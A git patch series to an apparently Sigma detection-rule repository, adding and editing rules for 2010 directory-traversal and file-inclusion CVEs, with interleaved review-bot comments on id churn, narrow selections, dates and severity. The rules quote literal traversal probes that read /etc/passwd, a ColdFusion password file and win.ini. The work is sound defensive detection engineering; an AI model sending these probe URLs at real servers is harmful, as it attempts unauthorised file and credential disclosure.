+id: 9876750e-ffd6-41a6-9486-31f17db8ab87
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the BF Survey (com_bfsurvey) component
+ for Joomla! allows remote attackers to include and execute arbitrary local files
+ via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/10946
+- https://www.cvedetails.com/cve/CVE-2010-2259
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2307.yaml b/rules/web/web_cve_CVE-2010-2307.yaml
index 8d787692..221de5f3 100644
--- a/rules/web/web_cve_CVE-2010-2307.yaml
+++ b/rules/web/web_cve_CVE-2010-2307.yaml 
@@ -1,27 +1,27 @@
-title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM
- - Directory Traversal
-id: f03488dd-2c62-4541-9f0e-a11e8a7e1750
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the web server for Motorola
- SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
- remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
- (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
-references:
-- https://www.securityfocus.com/bid/40550/info
-- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2307:Motorola SBV6120E SURFboard Digital Voice Modem SBV6X2X-1.0.0.5-SCM
+ - Directory Traversal
+id: c2979f47-e361-4ce4-9f69-8a6a8bdf8916
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the web server for Motorola
+ SURFBoard cable modem SBV6120E running firmware SBV6X2X-1.0.0.5-SCM-02-SHPC allow
+ remote attackers to read arbitrary files via (1) "//" (multiple leading slash),
+ (2) ../ (dot dot) sequences, and encoded dot dot sequences in a URL request.
+references:
+- https://www.securityfocus.com/bid/40550/info
+- https://nvd.nist.gov/vuln/detail/CVE-2010-2307
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-2682.yaml b/rules/web/web_cve_CVE-2010-2682.yaml
index 01a72dff..af009d5e 100644
--- a/rules/web/web_cve_CVE-2010-2682.yaml
+++ b/rules/web/web_cve_CVE-2010-2682.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
-id: 99824e58-3cce-4172-9970-04e0a6de5108
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
- component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
- possibly have unspecified other impact via a .. (dot dot) in the controller parameter
- to index.php.
-references:
-- https://www.exploit-db.com/exploits/14017
-- https://www.cvedetails.com/cve/CVE-2010-2682
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2682:Joomla! Component Realtyna Translator 1.0.15 - Local File Inclusion
+id: a6e33159-2c73-4bde-b40c-cf013d639d8c
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the Realtyna Translator (com_realtyna)
+ component 1.0.15 for Joomla! allows remote attackers to read arbitrary files and
+ possibly have unspecified other impact via a .. (dot dot) in the controller parameter
+ to index.php.
+references:
+- https://www.exploit-db.com/exploits/14017
+- https://www.cvedetails.com/cve/CVE-2010-2682
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
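Review bot: The rule's `id` changes from `99824e58-3cce-4172-9970-04e0a6de5108` to `a6e33159-2c73-4bde-b40c-cf013d639d8c` although nothing else in the file differs, and the same file receives yet another id in the following `Author`→`author` commit; a Sigma id is meant to be a stable identifier that SIEM content, suppression lists and the `related` field of other rules point at, so it should be generated once when the rule is created and never touched by cosmetic edits. Every line of the file is removed and re-added while only the id differs, which looks like a line-ending or trailing-whitespace rewrite rather than a content change — worth confirming with a whitespace-ignoring diff before merging. The other full-file hunks in this series (CVE-2010-2307, -2861, -3426, -4231, -4617, -5278) and all 32 hunks of the following commit show the same id churn.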
diff --git a/rules/web/web_cve_CVE-2010-2861.yaml b/rules/web/web_cve_CVE-2010-2861.yaml
index e5764559..57ec00fa 100644
--- a/rules/web/web_cve_CVE-2010-2861.yaml
+++ b/rules/web/web_cve_CVE-2010-2861.yaml
@@ -1,27 +1,27 @@
-title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
-id: e22f6ee2-341a-44b8-a58b-33a0960fa8e0
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Multiple directory traversal vulnerabilities in the administrator console
- in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
- via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
- (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
- in CFIDE/administrator/.
-references:
-- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
-- http://www.adobe.com/support/security/bulletins/apsb10-18.html
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-2861:Adobe ColdFusion 8.0/8.0.1/9.0/9.0.1 LFI
+id: 422116aa-40e3-4e44-a32f-b6c6f5855200
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Multiple directory traversal vulnerabilities in the administrator console
+ in Adobe ColdFusion 9.0.1 and earlier allow remote attackers to read arbitrary files
+ via the locale parameter to (1) CFIDE/administrator/settings/mappings.cfm, (2) logging/settings.cfm,
+ (3) datasources/index.cfm, (4) j2eepackaging/editarchive.cfm, and (5) enter.cfm
+ in CFIDE/administrator/.
+references:
+- https://github.com/vulhub/vulhub/tree/master/coldfusion/CVE-2010-2861
+- http://www.adobe.com/support/security/bulletins/apsb10-18.html
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /CFIDE/administrator/enter.cfm?locale=../../../../../../../lib/password.properties%00en
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-3426.yaml b/rules/web/web_cve_CVE-2010-3426.yaml
index d0c9a6c0..e6d0e930 100644
--- a/rules/web/web_cve_CVE-2010-3426.yaml
+++ b/rules/web/web_cve_CVE-2010-3426.yaml
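Review bot: The selection matches one exact scanner payload — a fixed run of seven `../`, the file name `lib/password.properties` and the `%00en` suffix, all on `enter.cfm` — so a request with a different traversal depth, a different target file, or any of the other four administrator pages the description itself lists (mappings.cfm, settings.cfm, index.cfm, editarchive.cfm) will not match. A selection keyed on the vulnerable parameter rather than the template string would cover the CVE instead of one tool's probe, e.g. `c-uri|contains|all:` with the values `- /CFIDE/administrator/` and `- locale=../`. The same verbatim-payload pattern is used in the CVE-2010-2682, -3426, -4617 and -5278 hunks and the same generalisation applies there.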
@@ -1,23 +1,23 @@
-title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
-id: 8df31def-3d71-4f01-85ab-4891fa481a8c
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
- component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
- arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
-references:
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-3426:Joomla! Component Jphone 1.0 Alpha 3 - Local File Inclusion
+id: 542e1a33-d6b0-4843-9a27-ad846c2daf22
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in jphone.php in the JPhone (com_jphone)
+ component 1.0 Alpha 3 for Joomla! allows remote attackers to include and execute
+ arbitrary local files via a .. (dot dot) in the controller parameter to index.php.
+references:
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4231.yaml b/rules/web/web_cve_CVE-2010-4231.yaml
index 9863413f..436138ed 100644
--- a/rules/web/web_cve_CVE-2010-4231.yaml
+++ b/rules/web/web_cve_CVE-2010-4231.yaml
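Review bot: `date: 25/08/2021` is written day/month/year, but the Sigma specification defines the `date` attribute as `YYYY/MM/DD`, so this should read `date: 2021/08/25`; tooling that validates rule metadata or sorts rules by creation date will misparse or reject the current value. Every rule in this series carries the same string, so the correction belongs to the whole set rather than this file alone. The only reference given here is the generic nuclei-templates repository; a link to the CVE record would let a reader verify the affected component and version without opening the scanner's template.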
@@ -1,25 +1,25 @@
-title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal
-id: e097e932-b39e-4e00-ac6f-1f03e43fc716
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
- The server is vulnerable to directory transversal attacks, allowing access to any
- file on the camera file system.
-references:
-- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
-- https://www.exploit-db.com/exploits/15505
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /../../../../../../../../../../../../../etc/passwd
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-4231:Camtron CMNC-200 IP Camera - Directory Traversal
+id: aa46c601-90ce-48b3-b45e-c56eefd86134
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: The CMNC-200 IP Camera has a built-in web server that is enabled by default.
+ The server is vulnerable to directory transversal attacks, allowing access to any
+ file on the camera file system.
+references:
+- https://nvd.nist.gov/vuln/detail/CVE-2010-4231
+- https://www.exploit-db.com/exploits/15505
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /../../../../../../../../../../../../../etc/passwd
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-4617.yaml b/rules/web/web_cve_CVE-2010-4617.yaml
index 5a1a42e0..f925c853 100644
--- a/rules/web/web_cve_CVE-2010-4617.yaml
+++ b/rules/web/web_cve_CVE-2010-4617.yaml
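Review bot: `level: critical` sits uneasily with a `false_positives` list whose first entry is `Scanning from Nuclei`: the selection is the scanner's verbatim probe, so most matches will be the expected scanner traffic rather than a confirmed compromise, and a critical rating routes each of them to an analyst as if it were. Either document in `description` why a hit on this camera path warrants critical handling, or rate it `high` as exploitation-attempt rules usually are; the same question applies to every rule in this series. The description also spells the flaw "transversal", which should be "traversal" to match the title and the tag.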
@@ -1,25 +1,25 @@
-title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion
-id: 3965e578-e509-41e2-a572-12522bbcf4fd
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
- 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
- traversal sequences in the section parameter to index.php.
-references:
-- https://www.exploit-db.com/exploits/15791
-- https://www.cvedetails.com/cve/CVE-2010-4617
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-4617:Joomla! Component JotLoader 2.2.1 - Local File Inclusion
+id: 44d2ed53-964a-420c-a410-c4d44356a0f4
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in the JotLoader (com_jotloader) component
+ 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory
+ traversal sequences in the section parameter to index.php.
+references:
+- https://www.exploit-db.com/exploits/15791
+- https://www.cvedetails.com/cve/CVE-2010-4617
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /index.php?option=com_jotloader§ion=../../../../../../../../../../../../../../etc/passwd%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
diff --git a/rules/web/web_cve_CVE-2010-5278.yaml b/rules/web/web_cve_CVE-2010-5278.yaml
index 3618fefc..e8c0a733 100644
--- a/rules/web/web_cve_CVE-2010-5278.yaml
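Review bot: The selection value reads `option=com_jotloader§ion=../…` — the parameter separator has collapsed into the single character `§`, which is what the entity `&sect;` decodes to when `&section=` passes through an HTML entity decoder. A real request line carries `&section=`, so as written this literal can never match a logged URI; check the committed bytes and restore `&section=` (if the `§` is only an artefact of how this page was rendered, confirm that the file on disk is intact). A short comment such as `# parameter is "section"; keep the "&" unescaped` next to the value would make the next editor wary of the same corruption.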
+++ b/rules/web/web_cve_CVE-2010-5278.yaml
@@ -1,26 +1,26 @@
-title: CVE-2010-5278:MODx manager - Local File Inclusion
-id: 5f6499cc-97a6-49ed-af28-00278c2c954e
-Author: Subhash Popuri (@pbssubhash)
-date: 25/08/2021
-status: experimental
-description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
- in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled,
- allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key
- parameter.
-references:
-- https://www.exploit-db.com/exploits/34788
-- https://www.cvedetails.com/cve/CVE-2010-5278
-- https://github.com/projectdiscovery/nuclei-templates
-detection:
- selection:
- c-uri|contains:
- - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
- condition: selection
-false_positives:
-- Scanning from Nuclei
-- Penetration Testing Activity
-- Unknown
-tags:
-- attack.initial_access
-- attack.t1190
-level: critical
+title: CVE-2010-5278:MODx manager - Local File Inclusion
+id: 0ed9f57e-d400-4f95-aaa4-6356b8e7eaeb
+Author: Subhash Popuri (@pbssubhash)
+date: 25/08/2021
+status: experimental
+description: Directory traversal vulnerability in manager/controllers/default/resource/tvs.php
+ in MODx Revolution 2.0.2-pl, and possibly earlier, when magic_quotes_gpc is disabled,
+ allows remote attackers to read arbitrary files via a .. (dot dot) in the class_key
+ parameter.
+references:
+- https://www.exploit-db.com/exploits/34788
+- https://www.cvedetails.com/cve/CVE-2010-5278
+- https://github.com/projectdiscovery/nuclei-templates
+detection:
+ selection:
+ c-uri|contains:
+ - /manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
+ condition: selection
+false_positives:
+- Scanning from Nuclei
+- Penetration Testing Activity
+- Unknown
+tags:
+- attack.initial_access
+- attack.t1190
+level: critical
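Review bot: The selection assumes the web server writes the request target to `c-uri` exactly as sent, including the raw `%00` and the un-normalised `../` run; a server, proxy or log pipeline that URL-decodes or path-normalises before logging would record a collapsed path after `class_key=` and the rule would not fire. Nothing in the rule records which log source and encoding it was tested against, so add that to `description` (or a comment above `detection:`), and consider a second `contains` value of `class_key=../` so both the raw and decoded representations are covered. The trailing `%00` also means the literal only matches the null-byte variant of the probe, which the description does not mention as a requirement.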
From 121c30e516adf28a20de8a84814c55c84bdc5adc Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Wed, 25 Aug 2021 21:27:59 +0530 Subject: [PATCH 0578/1367] Changed Author to author --- rules/web/web_cve_CVE-2010-0943.yaml | 4 ++-- rules/web/web_cve_CVE-2010-0944.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1306.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1314.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1345.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1353.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1474.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1475.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1495.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1532.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1533.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1535.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1602.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1657.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1718.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1722.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1875.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1953.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1954.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1955.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1979.yaml | 4 ++-- rules/web/web_cve_CVE-2010-1983.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2033.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2036.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2259.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2307.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2682.yaml | 4 ++-- rules/web/web_cve_CVE-2010-2861.yaml | 4 ++-- rules/web/web_cve_CVE-2010-3426.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4231.yaml | 4 ++-- rules/web/web_cve_CVE-2010-4617.yaml | 4 ++-- rules/web/web_cve_CVE-2010-5278.yaml | 4 ++-- 32 files changed, 64 insertions(+), 64 deletions(-) diff --git a/rules/web/web_cve_CVE-2010-0943.yaml b/rules/web/web_cve_CVE-2010-0943.yaml index 59e19742..07b40e00 100644 --- a/rules/web/web_cve_CVE-2010-0943.yaml +++ b/rules/web/web_cve_CVE-2010-0943.yaml 
@@ -1,6 +1,6 @@
 title: CVE-2010-0943:Joomla! Component com_jashowcase - Directory Traversal
-id: 6a99f28f-8626-4419-93c8-9aa9e75c0068
-Author: Subhash Popuri (@pbssubhash)
+id: e5616a8c-a43e-47c2-9fd2-19b429581b90
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JA Showcase (com_jashowcase)
diff --git a/rules/web/web_cve_CVE-2010-0944.yaml b/rules/web/web_cve_CVE-2010-0944.yaml
index 2872b219..eb080266 100644
--- a/rules/web/web_cve_CVE-2010-0944.yaml
+++ b/rules/web/web_cve_CVE-2010-0944.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-0944:Joomla! Component com_jcollection - Directory Traversal
-id: ae369f4d-5f22-4969-8715-c8908394f279
-Author: Subhash Popuri (@pbssubhash)
+id: c3eada81-1f9a-4a55-97b8-d3207d89228e
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the JCollection (com_jcollection)
diff --git a/rules/web/web_cve_CVE-2010-1306.yaml b/rules/web/web_cve_CVE-2010-1306.yaml
index 2b48098e..1a6e6268 100644
--- a/rules/web/web_cve_CVE-2010-1306.yaml
+++ b/rules/web/web_cve_CVE-2010-1306.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1306:Joomla! Component Picasa 2.0 - Local File Inclusion
-id: 3cea101d-f72d-441f-8fdc-8462cfac20e7
-Author: Subhash Popuri (@pbssubhash)
+id: 560cd98d-aa1d-451b-90a5-08ce5ab72d7b
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Picasa (com_joomlapicasa2) component
diff --git a/rules/web/web_cve_CVE-2010-1314.yaml b/rules/web/web_cve_CVE-2010-1314.yaml
index 8673ae89..e36b0aca 100644
--- a/rules/web/web_cve_CVE-2010-1314.yaml
+++ b/rules/web/web_cve_CVE-2010-1314.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1314:Joomla! Component Highslide 1.5 - Local File Inclusion
-id: 9a7d17b2-ba50-4f83-bd75-92bcb0ba190f
-Author: Subhash Popuri (@pbssubhash)
+id: 18019647-a68c-412a-bca9-626618b1a79c
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Highslide JS (com_hsconfig)
diff --git a/rules/web/web_cve_CVE-2010-1345.yaml b/rules/web/web_cve_CVE-2010-1345.yaml
index 29326297..6c3fe8c8 100644
--- a/rules/web/web_cve_CVE-2010-1345.yaml
+++ b/rules/web/web_cve_CVE-2010-1345.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1345:Joomla! Component Cookex Agency CKForms - Local File Inclusion
-id: dc5198bb-73cc-4a07-8b6c-b178d6c25265
-Author: Subhash Popuri (@pbssubhash)
+id: e70e977a-aaf3-4ec1-a948-493caea7cff3
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the Cookex Agency CKForms (com_ckforms)
diff --git a/rules/web/web_cve_CVE-2010-1353.yaml b/rules/web/web_cve_CVE-2010-1353.yaml
index 772094e3..a1c006bd 100644
--- a/rules/web/web_cve_CVE-2010-1353.yaml
+++ b/rules/web/web_cve_CVE-2010-1353.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1353:Joomla! Component LoginBox - Local File Inclusion
-id: ad0a798b-87d2-4701-82d4-f7a253e44d69
-Author: Subhash Popuri (@pbssubhash)
+id: 559e6e69-af61-407c-9949-a8602cfb6d95
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the LoginBox Pro (com_loginbox)
diff --git a/rules/web/web_cve_CVE-2010-1474.yaml b/rules/web/web_cve_CVE-2010-1474.yaml
index a9d56934..c023e301 100644
--- a/rules/web/web_cve_CVE-2010-1474.yaml
+++ b/rules/web/web_cve_CVE-2010-1474.yaml
@@ -1,6 +1,6 @@ title: CVE-2010-1474:Joomla! Component Sweetykeeper 1.5 - Local File Inclusion -id: 1248cb2d-f96a-49a0-83b0-c1e2c74ae397 -Author: Subhash Popuri (@pbssubhash) +id: 06040396-89e0-4919-a186-a3ac48eb2d85 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Sweety Keeper (com_sweetykeeper) diff --git a/rules/web/web_cve_CVE-2010-1475.yaml b/rules/web/web_cve_CVE-2010-1475.yaml index 465857ed..5d2fb64e 100644 --- a/rules/web/web_cve_CVE-2010-1475.yaml +++ b/rules/web/web_cve_CVE-2010-1475.yaml @@ -1,7 +1,7 @@ title: CVE-2010-1475:Joomla! Component Preventive And Reservation 1.0.5 - Local File Inclusion -id: 5cf9e456-3c79-4d1c-a926-a5a2d20b6f26 -Author: Subhash Popuri (@pbssubhash) +id: 568d0a33-0052-47bc-a04e-8f7e8f05e12d +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Preventive & Reservation (com_preventive) diff --git a/rules/web/web_cve_CVE-2010-1495.yaml b/rules/web/web_cve_CVE-2010-1495.yaml index db0c2483..b3340862 100644 --- a/rules/web/web_cve_CVE-2010-1495.yaml +++ b/rules/web/web_cve_CVE-2010-1495.yaml @@ -1,6 +1,6 @@ title: CVE-2010-1495:Joomla! Component Matamko 1.01 - Local File Inclusion -id: 807aa121-81eb-418f-9bbb-a215d8c6f0e7 -Author: Subhash Popuri (@pbssubhash) +id: cb3ac5e3-de9e-44b7-b0f5-b18a13ba3c69 +author: Subhash Popuri (@pbssubhash) date: 25/08/2021 status: experimental description: Directory traversal vulnerability in the Matamko (com_matamko) component diff --git a/rules/web/web_cve_CVE-2010-1532.yaml b/rules/web/web_cve_CVE-2010-1532.yaml index 76359b0d..d80c1a20 100644 --- a/rules/web/web_cve_CVE-2010-1532.yaml +++ b/rules/web/web_cve_CVE-2010-1532.yaml 
@@ -1,6 +1,6 @@
 title: CVE-2010-1532:Joomla! Component PowerMail Pro 1.5.3 - Local File Inclusion
-id: 3f5ed59b-1944-4325-b675-5ea2441069f1
-Author: Subhash Popuri (@pbssubhash)
+id: ea2cd3fd-60fc-4945-be6d-e69340a0159d
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the givesight PowerMail Pro (com_powermail)
diff --git a/rules/web/web_cve_CVE-2010-1533.yaml b/rules/web/web_cve_CVE-2010-1533.yaml
index d0566b2f..1a181a6a 100644
--- a/rules/web/web_cve_CVE-2010-1533.yaml
+++ b/rules/web/web_cve_CVE-2010-1533.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1533:Joomla! Component TweetLA 1.0.1 - Local File Inclusion
-id: fb9d6f93-d5ce-45e5-abf4-51b092d082a2
-Author: Subhash Popuri (@pbssubhash)
+id: fc58d241-5812-4a66-acad-2c9370fc2975
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TweetLA (com_tweetla) component
diff --git a/rules/web/web_cve_CVE-2010-1535.yaml b/rules/web/web_cve_CVE-2010-1535.yaml
index 3f94a2df..80029d7f 100644
--- a/rules/web/web_cve_CVE-2010-1535.yaml
+++ b/rules/web/web_cve_CVE-2010-1535.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1535:Joomla! Component TRAVELbook 1.0.1 - Local File Inclusion
-id: 74d51ae3-410b-4654-bb2d-20cca140a39c
-Author: Subhash Popuri (@pbssubhash)
+id: a4abca47-5c67-4b8c-a549-4e04f43ce751
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the TRAVELbook (com_travelbook)
diff --git a/rules/web/web_cve_CVE-2010-1602.yaml b/rules/web/web_cve_CVE-2010-1602.yaml
index 6703b9a5..aba67724 100644
--- a/rules/web/web_cve_CVE-2010-1602.yaml
+++ b/rules/web/web_cve_CVE-2010-1602.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1602:Joomla! Component ZiMB Comment 0.8.1 - Local File Inclusion
-id: 78b8be95-2dac-4660-867b-3096670f1801
-Author: Subhash Popuri (@pbssubhash)
+id: 25e8e854-0a76-4f55-9b7a-9769ea2dbebc
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the ZiMB Comment (com_zimbcomment)
diff --git a/rules/web/web_cve_CVE-2010-1657.yaml b/rules/web/web_cve_CVE-2010-1657.yaml
index 8cc04a14..1772f0c8 100644
--- a/rules/web/web_cve_CVE-2010-1657.yaml
+++ b/rules/web/web_cve_CVE-2010-1657.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1657:Joomla! Component SmartSite 1.0.0 - Local File Inclusion
-id: 1b858384-5226-47df-beb9-d9162c63b0da
-Author: Subhash Popuri (@pbssubhash)
+id: 4fbedbee-ea11-4a65-9c25-bbb0d74f58fe
+author: Subhash Popuri (@pbssubhash)
 date: 25/08/2021
 status: experimental
 description: Directory traversal vulnerability in the SmartSite (com_smartsite) component
diff --git a/rules/web/web_cve_CVE-2010-1718.yaml b/rules/web/web_cve_CVE-2010-1718.yaml
index 22aa3401..9e4d9a4a 100644
--- a/rules/web/web_cve_CVE-2010-1718.yaml
+++ b/rules/web/web_cve_CVE-2010-1718.yaml
@@ -1,6 +1,6 @@
 title: CVE-2010-1718:Joomla! Component Archery Scores 1.0.6 - Local File Inclusion
-id: 7f99cad1-85b6-4521-801e-aa27fa249207
-Author: Subhash Popuri (@pbssubhash)
